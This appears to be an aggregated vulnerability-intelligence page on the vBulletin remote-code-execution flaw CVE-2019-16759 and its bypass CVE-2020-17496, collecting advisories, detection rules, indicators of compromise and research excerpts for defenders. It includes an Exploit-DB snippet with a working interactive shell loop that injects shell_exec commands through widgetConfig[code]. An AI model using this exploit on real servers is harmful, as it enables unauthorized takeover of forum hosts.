CVE-2019-16759
published 2019-09-24
CVE-2019-16759: vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Priority P198 · critical · 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability · due 2022-05-03
Exploited in the wild
EPSS: 99.73% (100.0th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | 5.0.0 – 5.5.4 | — |
| vbulletin | vbulletin | 5.5.4 – 5.6.2 | — |
Detection & IOCs
- Detect POST requests to /index.php with the routestring parameter set to 'ajax/render/widget_php'; this is the canonical exploit path for CVE-2019-16759.
- Inspect the POST body for the 'widgetConfig[code]' parameter containing PHP code or shell_exec calls, which is the injection vector for this SSTI/RCE.
- Monitor for unauthorized modifications to bbcode.php (includes/vb5/frontend/controller/bbcode.php); attackers overwrote this file to implant a backdoor gated by the 'epass' request parameter.
- Detect HTTP requests containing the 'epass' parameter with value '2dmfrb28nu3c6s9j', which is the C2 backdoor authentication token implanted in compromised vBulletin instances.
- The Check Point IPS blade signature name 'vBulletin Forum Remote Code Execution (CVE-2019-16759)' can be used as a reference for IPS/IDS rule naming and tuning.
- The vulnerability only triggers when PHP rendering is enabled in vBulletin's administration panel; disabling PHP, Static HTML, and Ad Module rendering mitigates the attack without patching.
- CVE-2020-7373 (vBulletin 5.5.4–5.6.2 via subWidgets/widget_tabbedcontainer_tab_panel) is an incomplete fix bypass of CVE-2019-16759; detections for the original CVE may not cover this variant.
CVSS provenance
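| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |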
GHSA
GHSA-c7wq-5768-48mp: vBulletin 5
ghsa_unreviewed·2022-05-24
CVE-2019-16759 [HIGH] CWE-20 GHSA-c7wq-5768-48mp: vBulletin 5
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
GHSA
GHSA-mvwh-2m72-5jm7: vBulletin 5
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-7373 [CRITICAL] CWE-77 GHSA-mvwh-2m72-5jm7: vBulletin 5
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. ALSO NOTE: CVE-2020-7373 is a duplicate of CVE-2020-17496. CVE-2020-17496 is the preferred CVE ID to track this vulnerability.
GHSA
GHSA-j77p-6wx9-cjqq: vBulletin 5
ghsa_unreviewed·2022-05-24·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 GHSA-j77p-6wx9-cjqq: vBulletin 5
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16759 [CRITICAL] CWE-94 vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; https://www.imperva.com/blog/crimeops-of-the-kashmirblack-botnet-part-ii/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/11/09055246/Mod
CISA
vBulletin PHP Module Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2019-16759 [CRITICAL] CWE-94 vBulletin PHP Module Remote Code Execution Vulnerability
Vulnerability: vBulletin PHP Module Remote Code Execution Vulnerability
Affected: vBulletin vBulletin
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring request.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-16759
Remediation Due Date: 2022-05-03
CISA
vBulletin PHP Module Remote Code Execution Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
Vulnerability: vBulletin PHP Module Remote Code Execution Vulnerability
Affected: vBulletin vBulletin
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-17496
Remediation Due Date: 2022-05-03
Suricata
ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)
suricata·2020-08-10·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)
Rule: alert http $EXTERNAL_NET any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS vBulletin RCE Inbound (CVE-2019-16759 Bypass)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/widget_tabbedcontainer_tab_panel"; fast_pattern; http.request_body; content:"subWidgets|5b|"; content:"|3b|"; distance:0; reference:url,blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/; classtype:attempted-admin; sid:2030667; rev:1; metadata:attack_target Web_Server, created_at 2020_08_10, cve CVE_2019_16759, deployment Perimeter, confidence High, signature_severity Major, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_08_10;)
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2
suricata·2019-10-14·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"routestring"; fast_pattern; content:"ajax"; within:7; content:"render"; within:9; content:"widget_php"; within:13; http.request_body; content:"widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; reference:url,unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; classtype:attempted-admin; sid:2028825; rev:3; metad
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3
suricata·2019-10-14·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M3"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"?routestring"; fast_pattern; content:"ajax"; within:7; content:"render"; within:9; content:"widget_php"; within:13; content:"&widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; reference:url,unit42.paloaltonetworks.com/exploits-in-the-wild-for-vbulletin-pre-auth-rce-vulnerability-cve-2019-16759/; classtype:attempted-admin; sid:2028826; rev:3; metadata:affected_produ
Suricata
ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1
suricata·2019-09-25·CVSS 9.8
CVE-2019-16759 [CRITICAL] ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT vBulletin 5.x Unauthenticated Remote Code Execution (CVE-2019-16759) M1"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"routestring"; fast_pattern; content:"ajax"; within:100; content:"render"; within:9; content:"widget_php"; within:13; content:"widgetConfig"; nocase; content:"code"; within:7; content:"echo"; distance:0; nocase; content:"shell_exec"; nocase; within:13; reference:url,seclists.org/fulldisclosure/2019/Sep/31; classtype:attempted-admin; sid:2028621; rev:3; metadata:affected_product Web_Server_Applications, attack_target Server, created_at 2019_09_25, cve CVE_2019_16759, deployment Perimet
Exploit-DB
vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
exploitdb·2020-08-12·CVSS 9.8
[CRITICAL] vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
---
# Exploit Title: vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution
# Date: 2020-08-09
# Exploit Author: @zenofex
# Vendor Homepage: https://www.vbulletin.com/
# Software Link: None
# Version: 5.4.5 through 5.6.2
# Tested on: vBulletin 5.6.2 on Ubuntu 19.04
# CVE : None
# vBulletin 5.5.4 through 5.6.2 are vulnerable to a remote code
# execution vulnerability caused by incomplete patching of the previous
# "CVE-2019-16759" RCE. This logic bug allows for a single pre-auth
# request to execute PHP code on a target vBulletin forum.
#More info can be found at:
#https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
#!/usr/bin/env python3
# vBulletin 5.x pre-auth widget
Exploit-DB
vBulletin 5.x - Remote Command Execution (Metasploit)
exploitdb·2019-09-30·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.x - Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'vBulletin 5.x 0day pre-quth RCE exploit',
'Description' => %q{
vBulletin 5.x 0day pre-auth RCE exploit.
This should work on all versions from 5.0.0 till 5.5.4
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Reported by: anonymous', # reported by
'Original exploit by: anonymous', # original exploit
'Metasploit mod by: r00tpgp', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
},
'References' =>
[
['CVE', 'CVE-2019-16759'],
['EDB', 'NA'],
['URL', 'https://seclists.org/fulldisclosure/2019/Sep/31'],
['URL', 'https://cve.mitre.org/cgi-bin/cvename.c
Exploit-DB
vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution
exploitdb·2019-09-23
CVE-2019-16759 vBulletin 5.0 < 5.5.4 - 'widget_php ' Unauthenticated Remote Code Execution
vBulletin 5.0 " % sys.argv[0])
params = {"routestring":"ajax/render/widget_php"}
while True:
try:
cmd = raw_input("vBulletin$ ")
params["widgetConfig[code]"] = "echo shell_exec('"+cmd+"'); exit;"
r = requests.post(url = sys.argv[1], data = params)
if r.status_code == 200:
print r.text
else:
sys.exit("Exploit failed! :(")
except KeyboardInterrupt:
sys.exit("\nClosing shell...")
except Exception, e:
sys.exit(str(e))
Metasploit
vBulletin widgetConfig RCE
metasploit
vBulletin 5.x through 5.5.4 allows remote command execution via the widgetConfig[code] parameter in an ajax/render/widget_php routestring POST request.
Nuclei
vBulletin 5.5.4 - 5.6.2- Remote Command Execution
nuclei·CVSS 9.8
CVE-2020-17496 [CRITICAL] vBulletin 5.5.4 - 5.6.2- Remote Command Execution
vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
Template:
id: CVE-2020-17496
info:
name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
author: pussycat0x
severity: critical
description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation:
Nuclei
vBulletin 5.0.0-5.5.4 - Remote Command Execution
nuclei·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.0.0-5.5.4 - Remote Command Execution
vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Template:
id: CVE-2019-16759
info:
name: vBulletin 5.0.0-5.5.4 - Remote Command Execution
author: madrobot
severity: critical
description: vBulletin 5.0.0 through 5.5.4 is susceptible to a remote command execution vulnerability via the widgetConfig parameter in an ajax/render/widget_php routestring request. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control
Metasploit
vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
metasploit·CVSS 9.8
CVE-2019-16759 [CRITICAL] vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.
This module exploits a logic bug within the template rendering code in vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. This causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to earl
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Network Attack Trends: Internet of Threats (August-October 2020)
Yue Guan
Lei Xu
Ken Hsu
Zhibin Zhang
Published: January 22, 2021
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concern
Unit42
Network Attack Trends: Internet of Threats (August-October 2020)
blogs_unit42·2021-01-22·CVSS 9.8
CVE-2012-2311 [CRITICAL] Network Attack Trends: Internet of Threats (August-October 2020)
## Executive Summary
Unit 42 researchers observed interesting attack trends from August-October 2020. Despite a surge in scanner activities and HTTP directory traversal exploitation attempts, CVE-2012-2311 and CVE-2012-1823, which were the most commonly exploited vulnerabilities in the wild in early summer 2020, are no longer at the top of that list. Several new critical exploits, including but not limited to CVE-2020-17496 and CVE-2020-25213, have emerged and were being utilized at a constant and concerning rate as of fall 2020. To complicate matters, malicious actors are well aware that new exploits aren’t always needed to get the job done. Based on observations of malicious traffic for the designated three months, weaponized ThinkPHP vulnerabilities like CVE-2018-20062 and CVE-2019-908
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites.
Recently, Unit 42 researchers found exploits in the wild leveraging the vBulletin pre-auth RCE vulnerability CVE-2020-17496. The exploits are a bypass of the fix for the previous vulnerability, CVE-2019-16759, which allows attackers to send a crafted HTTP request wi
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
blogs_unit42·2020-09-03·CVSS 9.8
CVE-2020-17496 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2020-17496
Haozhe Zhang
Qi Deng
Zhibin Zhang
Ruchna Nigam
Published: September 3, 2020
## Executive Summary
In September 2019, a remote code execution (RCE) vulnerability identified as CVE-2019-16759 was disclosed for vBulletin, a popular forum software. At that time, Unit 42 researchers published a blog on this vBulletin vulnerability, analyzing its root cause and the exploit we found in the wild. By exploiting this vulnerability, an attacker could have gained privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organi
Trendmicro
Patches for Security Vulnerabilities
blogs_trendmicro·2020-08-17·CVSS 6.1
[MEDIUM] Patches for Security Vulnerabilities
## Patches for Security Vulnerabilities
By: Trend Micro, Aug 17, 2020
Original article by Trend Micro
Vulnerabilities expose enterprise systems to compromise. Now that many employees are working from home and operating devices outside secure office environments, the need to fix vulnerabilities as soon as they are discovered has become even more urgent. Besides Microsoft, the following vendors have also recently released patches: Adobe, Citrix, Intel and vBulletin. What follows is a summary of these recently disclosed vulnerabilities, and organizations are well advised to check immediately whether the software they use is affected by them.
Adobe Security
Checkpoint
17th August – Threat Intelligence Bulletin
blogs_checkpoint·2020-08-17
CVE-2020-1380 17th August – Threat Intelligence Bulletin
## 17th August – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 17th August 2020, please download our Threat Intelligence Bulletin.
Top Attacks and Breaches
The SANS information security training institute has suffered a data breach comprised of 27,000 records of PII (Personally Identifiable Information) which were forwarded to an external email address. SANS traced the source of the attack to a phishing email.
The city of Lafayette Colorado has fallen victim to a ranso
Tenable
CVE-2020-17496: Zero-Day Remote Code Execution Vulnerability in vBulletin Disclosed
blogs_tenable·2020-08-10·CVSS 9.8
[CRITICAL] CVE-2020-17496: Zero-Day Remote Code Execution Vulnerability in vBulletin Disclosed
Tenable
CVE-2020-12720: vBulletin Urges Users to Patch Undisclosed Security Vulnerability
blogs_tenable·2020-05-08·CVSS 9.8
[CRITICAL] CVE-2020-12720: vBulletin Urges Users to Patch Undisclosed Security Vulnerability
Tenable
Objects in Mirror Are Closer Than They Appear: Reflecting on the Cybersecurity Threats from 2019
blogs_tenable·2019-12-16
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
blogs_unit42·2019-10-09·CVSS 9.8
CVE-2019-16759 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
## Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
Qi Deng
Zhibin Zhang
Hui Gao
Published: October 9, 2019
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from thei
Unit42
Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
blogs_unit42·2019-10-09·CVSS 9.8
CVE-2019-16759 [CRITICAL] Exploits in the Wild for vBulletin Pre-Auth RCE Vulnerability CVE-2019-16759
## Executive Summary
A new zero-day vulnerability was recently disclosed for vBulletin, a proprietary Internet forum software and the assigned CVE number is CVE-2019-16759. Now, several weeks later, Unit 42 researchers have identified active exploitation of this vulnerability in the wild. By exploiting this vulnerability, an unauthenticated attacker can gain privileged access and control over any vBulletin server running versions 5.0.0 up to 5.5.4, and potentially lock organizations out from their own sites. More than 100,000 sites are built on vBulletin, including the forums of major enterprises and organizations, so it’s imperative to patch immediately.
In this blog post we provide new details on the root cause of the vulnerability, proof of concept code (PoC) to demonstrate the vulner
Checkpoint
2nd October – Threat Intelligence Bulletin
blogs_checkpoint·2019-10-02·CVSS 9.8
CVE-2019-16759 [CRITICAL] 2nd October – Threat Intelligence Bulletin
## 2nd October – Threat Intelligence Bulletin
For the latest discoveries in cyber research for the week of 2nd October 2019, please download our Threat Intelligence Bulletin
TOP ATTACKS AND BREACHES
Check Point researchers have identified a targeted and extensive attack against East Asian government entities over the span of 7 months. The attackers, which apparently are members of the Chinese Rancor threat group, used spear-phishing to reach their victims, pretending to send emails from other government offices.
Tenable
Critical Zero-Day Pre-authentication Remote Code Execution Exploit Published for 5.x Versions of vBulletin
blogs_tenable·2019-09-24
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Raveen Kanishka Jayalath*, University of Adelaide, Australia
Hussain Ahmad*, University of Adelaide, Australia
Diksha Goel, CSIRO's Data61, Australia
Muhammad Shuja Syed, SLB, USA
Faheem Ullah, University of Adelaide, Australia
*Authors contributed equally to this work. Corresponding author.
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
- http://packetstormsecurity.com/files/154623/vBulletin-5.x-0-Day-Pre-Auth-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/154648/vBulletin-5.x-Pre-Auth-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/155633/vBulletin-5.5.4-Remote-Command-Execution.html
- http://packetstormsecurity.com/files/158829/vBulletin-5.x-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/158830/vBulletin-5.x-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/158866/vBulletin-5.x-Remote-Code-Execution.html
- http://seclists.org/fulldisclosure/2020/Aug/5
- https://arstechnica.com/information-technology/2019/09/public-exploit-code-spawns-mass-attacks-against-high-severity-vbulletin-bug/
- https://seclists.org/fulldisclosure/2019/Sep/31
- https://www.theregister.co.uk/2019/09/24/vbulletin_vbug_zeroday/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-16759
2019-09-24: Published
2021-11-03: Added to CISA KEV
Exploited in the wild